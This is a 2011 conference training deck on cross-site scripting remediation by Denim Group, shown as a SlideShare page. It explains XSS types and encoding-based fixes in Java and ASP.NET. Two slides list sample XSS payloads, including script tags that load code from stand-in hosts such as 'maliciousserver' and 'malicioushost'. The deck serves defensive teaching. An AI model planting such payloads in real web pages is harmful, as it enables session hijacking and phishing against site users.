SlideShare ist ein Scribd-Unternehmen logo

XSS Remediation

Denim Group
Denim Group

This document discusses cross-site scripting (XSS) vulnerabilities and remediation. It begins with an introduction to XSS and examples of reflected and stored XSS. It then covers crafting XSS payloads and the impact of successful attacks. The document concludes with recommendations for mitigation, including input validation, output encoding, and tools like OWASP ESAPI and the Microsoft Web Protection Library.

Technologie
1 von 34
Downloaden Sie, um offline zu lesen
Cross-Site Scripting (XSS) Remediation Guerilla Training Camp Security BSides Austin Dan Cornell © Copyright 2011 Denim Group - All Rights Reserved
My Background • Dan Cornell, founder and CTO of Denim Group • Software developer by background (Java, .NET, etc) • OWASP San Antonio, Global Membership Committee • Denim Group – Build software with special security, performance, reliability requirements – Help organizations deal with the risk associated with their software • Code reviews and application assessments • SDLC consulting • Secure development training – instructor-led and eLearning © Copyright 2011 Denim Group - All Rights Reserved 1
Agenda • What is Cross-Site Scripting (XSS)? • How Do You Remediate XSS Vulnerabilities? • Questions © Copyright 2011 Denim Group - All Rights Reserved 2
Vulnerability: Cross-Site Scripting #2 in the OWASP Top 10 If an attacker controls your browser – it is no longer your browser © Copyright 2011 Denim Group - All Rights Reserved 3
Let's look at a simple application Web Application Web Browser Administrative Pages Administrator Database Web Browser User Pages Attacker © Copyright 2011 Denim Group - All Rights Reserved 4
A standard user can update the name and email address on their profile: NormalGuy normalguy@normalmail.com An administrative user can retrieve this information, shown in a page: <input type="text" name="name" value="NormalGuy"><br> <input type="text" name="email" value="normalguy@normalmail.com"> © Copyright 2011 Denim Group - All Rights Reserved 5
With normal input <input type=”text” name=”name” value=”NormalGuy”><br> <input type=”text” name=”email” value=” normalguy@normalmail.com”> Web Browser Administrative Pages Administrator Database Web Browser User Pages NormalGuy User normalguy@normalmail.com © Copyright 2011 Denim Group - All Rights Reserved 6
A malicious user can inject malicious scripts into their profile: MaliciousGuy "><script src="http://maliciousserver/rewritepage.js" /> When the administrative user retrieves this information: <input type="text" name="name" value="NormalGuy"><br> <input type="text" name="email" value=" "><script src="http://maliciousserver/rewritepage.js" />"> © Copyright 2011 Denim Group - All Rights Reserved 7
With malicious input <input type=”text” name=”name” value=”MaliciousGuy”><br> <input type=”text” name=”email” value=””><script src=”http://maliciousserver/rewritepage.js” />”> Web Browser Administrative Pages Administrator Database Web Browser User Pages Attacker MaliciousGuy ”><script src=”http://maliciousserver/rewritepage.js” /> © Copyright 2011 Denim Group - All Rights Reserved 8
What is Cross-Site Scripting? • Occurs when an application takes data from a user and sends it back to a web browser without validation or encoding • Victim's browser renders HTML and executes JavaScript chosen by the Attacker • Not a direct attack on the application – it is attack on users of the application – Exploitation can involve many scenarios including social engineering • Most common web application security issue – Based on MITRE statistics © Copyright 2011 Denim Group - All Rights Reserved 9
Impact of Cross-Site Scripting What can an attacker accomplish with a malicious script? © Copyright 2011 Denim Group - All Rights Reserved 10
Cross-Site Scripting Attacks • Attackers may have different means to have their code to execute on another user’s browser • Reflected • Stored • DOM Based © Copyright 2011 Denim Group - All Rights Reserved 11
Reflected Cross-Site Scripting • Attacker crafts a malicious link containing the payload • Attacker makes that link available for victims to click • Victim encounters malicious link and clicks • Web application reflects the payload back to the victim's browser where it is rendered and executed • Commonly found in – Login pages – Message pages © Copyright 2011 Denim Group - All Rights Reserved 12
Reflected Cross-Site Scripting Malicious Web Attacker User Web Application Server Send e-mail to user with link Link makes request to website Response includes malicious content Malicious content sends authentication information to attacker’s resources or Malicious content redirects user to malicious website © Copyright 2011 Denim Group - All Rights Reserved 13
Stored Cross-Site Scripting • Attacker posts payload to a database or other data store • Victim uses the same site and visits a page where the payload is sent back to the victim • The payload is rendered and executed in the browser • Commonly found in – Message boards (horizontal privilege escalation) – User management systems (vertical privilege escalation) © Copyright 2011 Denim Group - All Rights Reserved 14
Stored Cross-Site Scripting Attacker Web Application User Submit field with malicious content Request for content to approve Reply containing malicious content © Copyright 2011 Denim Group - All Rights Reserved 15
DOM-based Cross-Site Scripting • Attacker crafts a malicious link containing the payload • Attacker makes that link available for victims to click • Victim encounters malicious link and clicks • Client-side code parses user-supplied data to make decisions • Things to look for – document.URL – document.URLUnencoded – document.location (and its other properties) – Document.referrer – window.location (and its other properties) © Copyright 2011 Denim Group - All Rights Reserved 16
Crafting XSS Payloads • Most basic, if payload is echoed directly into open HTML – <script>alert('hi');</script> • Sometimes you may have to deal with application HTML – <input name='uname' value='<%= Request["uname"] %>' /> – uname parameter must: • Close out the value attribute: '> • Then include the payload: <script>alert('hi');</script> • Then clean up before the application HTML starts again: <' • Full payload: '><script>alert('hi');</script><' © Copyright 2011 Denim Group - All Rights Reserved 17
Crafting XSS Payloads Script with the 'src' attribute <SCRIPT SRC=http://malicioushost/maliciousscript.js></SCRIPT> An attacker is likely to use the 'src' attribute if the script requires more space than the application accommodates. Image <IMG SRC="javascript:alert('XSS');"> Body <BODY BACKGROUND="javascript:alert('XSS')"> © Copyright 2011 Denim Group - All Rights Reserved 18
Crafting XSS Payloads Input <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> Iframe <IFRAME SRC="javascript:alert('XSS');"></IFRAME> In addition, the iframe can point to a malicious page on a remote host. Table <TABLE BACKGROUND="javascript:alert('XSS')"> Div <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> © Copyright 2011 Denim Group - All Rights Reserved 19
Impact • Attacker can render HTML and execute script in the victim's browser, resulting in: – Session hijacking (adding JavaScript that forwards cookies to an attacker) – Misinformation (adding "For more info call 1-800-A-BAD-GUY" to a page) – Defacing web site (adding "This company is terrible!!!" to a page) – Inserting hostile content (adding malicious ActiveX controls to a page) – Phishing attacks (adding login FORM posts to 3rd party sites) – Takeover of the user's browser (adding JavaScript code to redirect the user) © Copyright 2011 Denim Group - All Rights Reserved 20
Mitigation • Positively validate inputs – Length, type, syntax, business rules • Encode application outputs – HTML or XML – < becomes &lt; and so on © Copyright 2011 Denim Group - All Rights Reserved 21
Java-specific Safeguards • Avoid using <%= %> because that does not encode outputs • Escape special HTML characters – < > ' " / & and so on… • Use URLEncoder class to encode characters being placed in a URL • Use Struts output mechanisms such as <bean:write …> • User JSTL escapeXML="true" attribute in <c:out …> • Use ESAPI Encoders © Copyright 2011 Denim Group - All Rights Reserved 22
.NET-specific Safeguards • .NET has built-in blacklist validation against many known XSS attacks – This is good, but not ideal – This can be turned off with ValidateRequest="false" in the Page tag (BAD!) • Validation framework offers many protection options – RegExValidator and others • Avoid using <%= %> because that does not encode outputs – Look at <%: %> syntax in ASP.NET 4 – http://weblogs.asp.net/scottgu/archive/2010/04/06/new-lt-gt-syntax-for-html- encoding-output-in-asp-net-4-and-asp-net-mvc-2.aspx • Better: Use HttpUtility.HtmlEncode() to encode user-supplied data that is reflected back to users • Best: Microsoft Web Protection Library (WPL) – http://wpl.codeplex.com/ © Copyright 2011 Denim Group - All Rights Reserved 23
Cross-Site Scripting Recap • Cross-Site Scripting (XSS) occurs when an application takes data from a user and sends it back to a web browser without validation or encoding • There are three main varieties: – Stored – Reflected – DOM-based • To guard against: – Positively validate inputs – Escape user-supplied data sent back to the browser © Copyright 2011 Denim Group - All Rights Reserved 24
OWASP ESAPI • Sites: – Main: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API – Java: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API#tab=Java_EE • Good: Provides very robust set of encoder functions • Less good: – Has a number of dependencies (~29) (currently – work on modularity is in progress) – Implementations are of varying maturity. Most useful for Java. © Copyright 2011 Denim Group - All Rights Reserved 25
OWASP ESAPI (Java) • To Use: – Follow the installation guide – Must create a folder (.esapi) to store your configuration and preferences • Get access to library: – Add all the support jars (31) to your project – Remove repeated jars – Add esapi-2.0_rc10.jar to your project <%@ page import="org.owasp.esapi.ESAPI, org.owasp.esapi.Encoder" %> • Make calls to encode tainted data: – ESAPI.encoder().encodeForHTML() – ESAPI.encoder().encodeForHTMLAttribute() © Copyright 2011 Denim Group - All Rights Reserved 26
ASP.NET Request Validation • ASP.NET provides some blacklist-based input validation to try and guard against HTML injection and cross-site scripting (XSS) attacks • This is turned on by default (yeah!) • Many applications disable it (boo!) – Blocked a valid request – Made trouble with AJAX – And so on © Copyright 2011 Denim Group - All Rights Reserved 27
ASP.NET Request Validation • How to configure or check if it is enabled? • This is turned on by default • In web.config: <configuration> <system.web> <pages validateRequest=“true|false" /> </system.web> </configuration> • Per-page: <%@ Page … ValidateRequest=“true|false" %> © Copyright 2011 Denim Group - All Rights Reserved 28
Microsoft Web Protection Library • Main site: – http://wpl.codeplex.com/ • To use: – Import reference to AntiXSS.dll (optionally include HtmlSanitizationLibrary.dll) • Found in C:Program Files (x86)Microsoft Information SecurityAntiXSS Library v4.0 – Get access to library: • In code: – using Microsoft.Security.Application; • In ASPX page: – <%@ Import Namespace="Microsoft.Security.Application" %> – Make call to encode tainted data: • AntiXss.HtmlEncode() • AntiXss.HtmlAttributeEncode() • And so on… © Copyright 2011 Denim Group - All Rights Reserved 29
Exercise: Fixing XSS Vulnerabilities • Java – Reflected XSS – Stored XSS • ASP.NET – Reflected XSS – Stored XSS © Copyright 2011 Denim Group - All Rights Reserved 30
But Your ASP.NET Examples Cheated! • This is true: ASP.NET provides some XSS protection via the ValidateRequest functionality • However: – This can be (and is often) turned off on a per-page or site-wide basis – It has been defeated in the past and will be defeated again in the future • http://www.procheckup.com/vulnerability_manager/documents/document_1258758664/byp assing-dot-NET-ValidateRequest.pdf • http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava- FavoriteXSS-SLIDES.pdf • If you want your code to be “Rugged” then you need to actually guard against cross-site scripting vulnerabilities in your code © Copyright 2011 Denim Group - All Rights Reserved 31
Resources • OWASP ESAPI – http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API • Microsoft Web Protection Library – http://wpl.codeplex.com/ • Denim Group Remediation Resource Center – www.denimgroup.com/remediation © Copyright 2011 Denim Group - All Rights Reserved 32
Questions? Dan Cornell dan@denimgroup.com Twitter: @danielcornell www.denimgroup.com (210) 572-4400 © Copyright 2011 Denim Group - All Rights Reserved 33

Empfohlen

Injection flaws
Injection flawsInjection flaws
Injection flaws
DANISH INAMDAR
 
Meetup React Sanca - 29/11/18 - React Testing
Meetup React Sanca - 29/11/18 - React TestingMeetup React Sanca - 29/11/18 - React Testing
Meetup React Sanca - 29/11/18 - React Testing
Augusto Lazaro
 
13 mongoose
13 mongoose13 mongoose
13 mongoose
Ahmed Elbassel
 
Students report card for C++ project..
Students report card for C++ project..Students report card for C++ project..
Students report card for C++ project..
Syed Muhammad Zeejah Hashmi
 
Hexagonal architecture & Elixir
Hexagonal architecture & ElixirHexagonal architecture & Elixir
Hexagonal architecture & Elixir
Nicolas Carlo
 
A Non-Standard use Case of Hadoop: High Scale Image Processing and Analytics
A Non-Standard use Case of Hadoop: High Scale Image Processing and AnalyticsA Non-Standard use Case of Hadoop: High Scale Image Processing and Analytics
A Non-Standard use Case of Hadoop: High Scale Image Processing and Analytics
DataWorks Summit
 
React for Dummies
React for DummiesReact for Dummies
React for Dummies
Mitch Chen
 
Avanthi Guduru ( Oracle DBA) Resume
Avanthi Guduru ( Oracle DBA) ResumeAvanthi Guduru ( Oracle DBA) Resume
Avanthi Guduru ( Oracle DBA) Resume
Avanthi Guduru
 

Empfohlen

Injection flaws
Injection flawsInjection flaws
Injection flaws
DANISH INAMDAR
 
Meetup React Sanca - 29/11/18 - React Testing
Meetup React Sanca - 29/11/18 - React TestingMeetup React Sanca - 29/11/18 - React Testing
Meetup React Sanca - 29/11/18 - React Testing
Augusto Lazaro
 
13 mongoose
13 mongoose13 mongoose
13 mongoose
Ahmed Elbassel
 
Students report card for C++ project..
Students report card for C++ project..Students report card for C++ project..
Students report card for C++ project..
Syed Muhammad Zeejah Hashmi
 
Hexagonal architecture & Elixir
Hexagonal architecture & ElixirHexagonal architecture & Elixir
Hexagonal architecture & Elixir
Nicolas Carlo
 
A Non-Standard use Case of Hadoop: High Scale Image Processing and Analytics
A Non-Standard use Case of Hadoop: High Scale Image Processing and AnalyticsA Non-Standard use Case of Hadoop: High Scale Image Processing and Analytics
A Non-Standard use Case of Hadoop: High Scale Image Processing and Analytics
DataWorks Summit
 
React for Dummies
React for DummiesReact for Dummies
React for Dummies
Mitch Chen
 
Avanthi Guduru ( Oracle DBA) Resume
Avanthi Guduru ( Oracle DBA) ResumeAvanthi Guduru ( Oracle DBA) Resume
Avanthi Guduru ( Oracle DBA) Resume
Avanthi Guduru
 
Object Oriented Javascript
Object Oriented JavascriptObject Oriented Javascript
Object Oriented Javascript
NexThoughts Technologies
 
FULL stack -> MEAN stack
FULL stack -> MEAN stackFULL stack -> MEAN stack
FULL stack -> MEAN stack
Ashok Raj
 
Full Stack Web Developer (MERN STACK Developer.pptx
Full Stack Web Developer (MERN STACK Developer.pptxFull Stack Web Developer (MERN STACK Developer.pptx
Full Stack Web Developer (MERN STACK Developer.pptx
RamudgarYadav
 
Mern stack developement
Mern stack developementMern stack developement
Mern stack developement
kalyankumar836878
 
Designing Effective Tests with React Testing Library - React Day Berlin 2022
Designing Effective Tests with React Testing Library - React Day Berlin 2022Designing Effective Tests with React Testing Library - React Day Berlin 2022
Designing Effective Tests with React Testing Library - React Day Berlin 2022
Josh Justice
 
Client server chat application
Client server chat applicationClient server chat application
Client server chat application
Samsil Arefin
 
Introduction to MERN
Introduction to MERNIntroduction to MERN
Introduction to MERN
ShyamMohanKunwar
 
REST vs. GraphQL: Critical Look
REST vs. GraphQL: Critical LookREST vs. GraphQL: Critical Look
REST vs. GraphQL: Critical Look
Nordic APIs
 
Hands-On Java web passando por Servlets, JSP, JSTL, JDBC, Hibernate, DAO, MV...
Hands-On Java web passando por Servlets, JSP, JSTL, JDBC, Hibernate, DAO, MV...Hands-On Java web passando por Servlets, JSP, JSTL, JDBC, Hibernate, DAO, MV...
Hands-On Java web passando por Servlets, JSP, JSTL, JDBC, Hibernate, DAO, MV...
Mario Jorge Pereira
 
Understanding Claim based Authentication
Understanding Claim based AuthenticationUnderstanding Claim based Authentication
Understanding Claim based Authentication
Mohammad Yousri
 
How to go about testing in React?
How to go about testing in React? How to go about testing in React?
How to go about testing in React?
Lisa Gagarina
 
STUDY JAM ON GOOGLE CLOUD PROGRAM
STUDY JAM ON GOOGLE CLOUD PROGRAM STUDY JAM ON GOOGLE CLOUD PROGRAM
STUDY JAM ON GOOGLE CLOUD PROGRAM
SHRIHARRIPRIYAR
 
MERN PPT
MERN PPTMERN PPT
MERN PPT
NeerajGupta96647
 
MongoDB Schema Design: Four Real-World Examples
MongoDB Schema Design: Four Real-World ExamplesMongoDB Schema Design: Four Real-World Examples
MongoDB Schema Design: Four Real-World Examples
Lewis Lin 🦊
 
Going realtime with Socket.IO
Going realtime with Socket.IOGoing realtime with Socket.IO
Going realtime with Socket.IO
Christian Joudrey
 
Java script
Java scriptJava script
Java script
vishal choudhary
 
Chat server nitish nagar
Chat server nitish nagarChat server nitish nagar
Chat server nitish nagar
Nitish Nagar
 
Telephony API
Telephony APITelephony API
Telephony API
Rashad Aliyev
 
BugBounty Tips.pdf
BugBounty Tips.pdfBugBounty Tips.pdf
BugBounty Tips.pdf
KhaledMohamed767546
 
Communication Protocols And Web Services
Communication Protocols And Web ServicesCommunication Protocols And Web Services
Communication Protocols And Web Services
Omer Katz
 
Smart Phones Dumb Apps
Smart Phones Dumb AppsSmart Phones Dumb Apps
Smart Phones Dumb Apps
Denim Group
 
Web application security
Web application securityWeb application security
Web application security
Jin Castor
 

Weitere ähnliche Inhalte

Was ist angesagt?

Designing Effective Tests with React Testing Library - React Day Berlin 2022
Designing Effective Tests with React Testing Library - React Day Berlin 2022Designing Effective Tests with React Testing Library - React Day Berlin 2022
Designing Effective Tests with React Testing Library - React Day Berlin 2022
Josh Justice
 
REST vs. GraphQL: Critical Look
REST vs. GraphQL: Critical LookREST vs. GraphQL: Critical Look
REST vs. GraphQL: Critical Look
Nordic APIs
 
Communication Protocols And Web Services
Communication Protocols And Web ServicesCommunication Protocols And Web Services
Communication Protocols And Web Services
Omer Katz
 

Was ist angesagt? (20)

Object Oriented Javascript
Object Oriented JavascriptObject Oriented Javascript
Object Oriented Javascript
 
FULL stack -> MEAN stack
FULL stack -> MEAN stackFULL stack -> MEAN stack
FULL stack -> MEAN stack
 
Full Stack Web Developer (MERN STACK Developer.pptx
Full Stack Web Developer (MERN STACK Developer.pptxFull Stack Web Developer (MERN STACK Developer.pptx
Full Stack Web Developer (MERN STACK Developer.pptx
 
Mern stack developement
Mern stack developementMern stack developement
Mern stack developement
 
Designing Effective Tests with React Testing Library - React Day Berlin 2022
Designing Effective Tests with React Testing Library - React Day Berlin 2022Designing Effective Tests with React Testing Library - React Day Berlin 2022
Designing Effective Tests with React Testing Library - React Day Berlin 2022
 
Client server chat application
Client server chat applicationClient server chat application
Client server chat application
 
Introduction to MERN
Introduction to MERNIntroduction to MERN
Introduction to MERN
 
REST vs. GraphQL: Critical Look
REST vs. GraphQL: Critical LookREST vs. GraphQL: Critical Look
REST vs. GraphQL: Critical Look
 
Hands-On Java web passando por Servlets, JSP, JSTL, JDBC, Hibernate, DAO, MV...
Hands-On Java web passando por Servlets, JSP, JSTL, JDBC, Hibernate, DAO, MV...Hands-On Java web passando por Servlets, JSP, JSTL, JDBC, Hibernate, DAO, MV...
Hands-On Java web passando por Servlets, JSP, JSTL, JDBC, Hibernate, DAO, MV...
 
Understanding Claim based Authentication
Understanding Claim based AuthenticationUnderstanding Claim based Authentication
Understanding Claim based Authentication
 
How to go about testing in React?
How to go about testing in React? How to go about testing in React?
How to go about testing in React?
 
STUDY JAM ON GOOGLE CLOUD PROGRAM
STUDY JAM ON GOOGLE CLOUD PROGRAM STUDY JAM ON GOOGLE CLOUD PROGRAM
STUDY JAM ON GOOGLE CLOUD PROGRAM
 
MERN PPT
MERN PPTMERN PPT
MERN PPT
 
MongoDB Schema Design: Four Real-World Examples
MongoDB Schema Design: Four Real-World ExamplesMongoDB Schema Design: Four Real-World Examples
MongoDB Schema Design: Four Real-World Examples
 
Going realtime with Socket.IO
Going realtime with Socket.IOGoing realtime with Socket.IO
Going realtime with Socket.IO
 
Java script
Java scriptJava script
Java script
 
Chat server nitish nagar
Chat server nitish nagarChat server nitish nagar
Chat server nitish nagar
 
Telephony API
Telephony APITelephony API
Telephony API
 
BugBounty Tips.pdf
BugBounty Tips.pdfBugBounty Tips.pdf
BugBounty Tips.pdf
 
Communication Protocols And Web Services
Communication Protocols And Web ServicesCommunication Protocols And Web Services
Communication Protocols And Web Services
 

Ähnlich wie XSS Remediation

Smart Phones Dumb Apps
Smart Phones Dumb AppsSmart Phones Dumb Apps
Smart Phones Dumb Apps
Denim Group
 
Web application security
Web application securityWeb application security
Web application security
Jin Castor
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
Denim Group
 
גיא אילון Websense
גיא אילון Websenseגיא אילון Websense
גיא אילון Websense
lihig
 
Fy09 Sask Tel Learn It Ie7 And Ie8 Joel Semeniuk
Fy09 Sask Tel Learn It Ie7 And Ie8 Joel SemeniukFy09 Sask Tel Learn It Ie7 And Ie8 Joel Semeniuk
Fy09 Sask Tel Learn It Ie7 And Ie8 Joel Semeniuk
sim100
 
Software Security for Project Managers: What Do You Need To Know?
Software Security for Project Managers: What Do You Need To Know?Software Security for Project Managers: What Do You Need To Know?
Software Security for Project Managers: What Do You Need To Know?
Denim Group
 
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Capgemini
 
Corona - Ph.D. Defense Slides
Corona - Ph.D. Defense SlidesCorona - Ph.D. Defense Slides
Corona - Ph.D. Defense Slides
Pluribus One
 
Benchmarking Web Application Scanners for YOUR Organization
Benchmarking Web Application Scanners for YOUR OrganizationBenchmarking Web Application Scanners for YOUR Organization
Benchmarking Web Application Scanners for YOUR Organization
Denim Group
 
Know Your Enemy: Behind the Scenes of Malicious Web Servers
Know Your Enemy: Behind the Scenes of Malicious Web ServersKnow Your Enemy: Behind the Scenes of Malicious Web Servers
Know Your Enemy: Behind the Scenes of Malicious Web Servers
webhostingguy
 
Don’t let Your Website Spread Malware – a New Approach to Web App Security
Don’t let Your Website Spread Malware – a New Approach to Web App SecurityDon’t let Your Website Spread Malware – a New Approach to Web App Security
Don’t let Your Website Spread Malware – a New Approach to Web App Security
Sasha Nunke
 

Ähnlich wie XSS Remediation (20)

Smart Phones Dumb Apps
Smart Phones Dumb AppsSmart Phones Dumb Apps
Smart Phones Dumb Apps
 
Web application security
Web application securityWeb application security
Web application security
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
 
Do You Write Secure Code? by Erez Metula
Do You Write Secure Code? by Erez MetulaDo You Write Secure Code? by Erez Metula
Do You Write Secure Code? by Erez Metula
 
גיא אילון Websense
גיא אילון Websenseגיא אילון Websense
גיא אילון Websense
 
How to Stop Man in the Browser Attacks
How to Stop Man in the Browser AttacksHow to Stop Man in the Browser Attacks
How to Stop Man in the Browser Attacks
 
Mobile Browser Content Handling
Mobile Browser Content HandlingMobile Browser Content Handling
Mobile Browser Content Handling
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awareness
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
 
Fy09 Sask Tel Learn It Ie7 And Ie8 Joel Semeniuk
Fy09 Sask Tel Learn It Ie7 And Ie8 Joel SemeniukFy09 Sask Tel Learn It Ie7 And Ie8 Joel Semeniuk
Fy09 Sask Tel Learn It Ie7 And Ie8 Joel Semeniuk
 
Software Security for Project Managers: What Do You Need To Know?
Software Security for Project Managers: What Do You Need To Know?Software Security for Project Managers: What Do You Need To Know?
Software Security for Project Managers: What Do You Need To Know?
 
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
 
Jean pier talbot - web is the battlefield - atlseccon2011
Jean pier talbot - web is the battlefield - atlseccon2011Jean pier talbot - web is the battlefield - atlseccon2011
Jean pier talbot - web is the battlefield - atlseccon2011
 
A mit m
A mit mA mit m
A mit m
 
Web security 2012
Web security 2012Web security 2012
Web security 2012
 
Corona - Ph.D. Defense Slides
Corona - Ph.D. Defense SlidesCorona - Ph.D. Defense Slides
Corona - Ph.D. Defense Slides
 
Benchmarking Web Application Scanners for YOUR Organization
Benchmarking Web Application Scanners for YOUR OrganizationBenchmarking Web Application Scanners for YOUR Organization
Benchmarking Web Application Scanners for YOUR Organization
 
Know Your Enemy: Behind the Scenes of Malicious Web Servers
Know Your Enemy: Behind the Scenes of Malicious Web ServersKnow Your Enemy: Behind the Scenes of Malicious Web Servers
Know Your Enemy: Behind the Scenes of Malicious Web Servers
 
Web browser and Security Threats
Web browser and Security ThreatsWeb browser and Security Threats
Web browser and Security Threats
 
Don’t let Your Website Spread Malware – a New Approach to Web App Security
Don’t let Your Website Spread Malware – a New Approach to Web App SecurityDon’t let Your Website Spread Malware – a New Approach to Web App Security
Don’t let Your Website Spread Malware – a New Approach to Web App Security
 

Mehr von Denim Group

Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Denim Group
 
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Denim Group
 
Optimizing Security Velocity in Your DevSecOps Pipeline at Scale
Optimizing Security Velocity in Your DevSecOps Pipeline at ScaleOptimizing Security Velocity in Your DevSecOps Pipeline at Scale
Optimizing Security Velocity in Your DevSecOps Pipeline at Scale
Denim Group
 
OWASP San Antonio Meeting 10/2/20
OWASP San Antonio Meeting 10/2/20OWASP San Antonio Meeting 10/2/20
OWASP San Antonio Meeting 10/2/20
Denim Group
 
AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA Program
AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA ProgramAppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA Program
AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA Program
Denim Group
 
Using Collaboration to Make Application Vulnerability Management a Team Sport
Using Collaboration to Make Application Vulnerability Management a Team SportUsing Collaboration to Make Application Vulnerability Management a Team Sport
Using Collaboration to Make Application Vulnerability Management a Team Sport
Denim Group
 
Security Champions: Pushing Security Expertise to the Edges of Your Organization
Security Champions: Pushing Security Expertise to the Edges of Your OrganizationSecurity Champions: Pushing Security Expertise to the Edges of Your Organization
Security Champions: Pushing Security Expertise to the Edges of Your Organization
Denim Group
 
The As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native ApplicationsThe As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native Applications
Denim Group
 
An Updated Take: Threat Modeling for IoT Systems
An Updated Take: Threat Modeling for IoT SystemsAn Updated Take: Threat Modeling for IoT Systems
An Updated Take: Threat Modeling for IoT Systems
Denim Group
 
Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...
Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...
Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...
Denim Group
 
AppSec in a World of Digital Transformation
AppSec in a World of Digital TransformationAppSec in a World of Digital Transformation
AppSec in a World of Digital Transformation
Denim Group
 
The As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native ApplicationsThe As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native Applications
Denim Group
 
AppSec in a World of Digital Transformation
AppSec in a World of Digital Transformation AppSec in a World of Digital Transformation
AppSec in a World of Digital Transformation
Denim Group
 
Enumerating Enterprise Attack Surface
Enumerating Enterprise Attack SurfaceEnumerating Enterprise Attack Surface
Enumerating Enterprise Attack Surface
Denim Group
 

Mehr von Denim Group (20)

Long-term Impact of Log4J
Long-term Impact of Log4JLong-term Impact of Log4J
Long-term Impact of Log4J
 
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
 
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
 
Optimizing Security Velocity in Your DevSecOps Pipeline at Scale
Optimizing Security Velocity in Your DevSecOps Pipeline at ScaleOptimizing Security Velocity in Your DevSecOps Pipeline at Scale
Optimizing Security Velocity in Your DevSecOps Pipeline at Scale
 
Application Asset Management with ThreadFix
Application Asset Management with ThreadFix Application Asset Management with ThreadFix
Application Asset Management with ThreadFix
 
OWASP San Antonio Meeting 10/2/20
OWASP San Antonio Meeting 10/2/20OWASP San Antonio Meeting 10/2/20
OWASP San Antonio Meeting 10/2/20
 
AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA Program
AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA ProgramAppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA Program
AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA Program
 
Using Collaboration to Make Application Vulnerability Management a Team Sport
Using Collaboration to Make Application Vulnerability Management a Team SportUsing Collaboration to Make Application Vulnerability Management a Team Sport
Using Collaboration to Make Application Vulnerability Management a Team Sport
 
Managing Penetration Testing Programs and Vulnerability Time to Live with Thr...
Managing Penetration Testing Programs and Vulnerability Time to Live with Thr...Managing Penetration Testing Programs and Vulnerability Time to Live with Thr...
Managing Penetration Testing Programs and Vulnerability Time to Live with Thr...
 
Security Champions: Pushing Security Expertise to the Edges of Your Organization
Security Champions: Pushing Security Expertise to the Edges of Your OrganizationSecurity Champions: Pushing Security Expertise to the Edges of Your Organization
Security Champions: Pushing Security Expertise to the Edges of Your Organization
 
The As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native ApplicationsThe As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native Applications
 
An Updated Take: Threat Modeling for IoT Systems
An Updated Take: Threat Modeling for IoT SystemsAn Updated Take: Threat Modeling for IoT Systems
An Updated Take: Threat Modeling for IoT Systems
 
Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...
Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...
Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...
 
A New View of Your Application Security Program with Snyk and ThreadFix
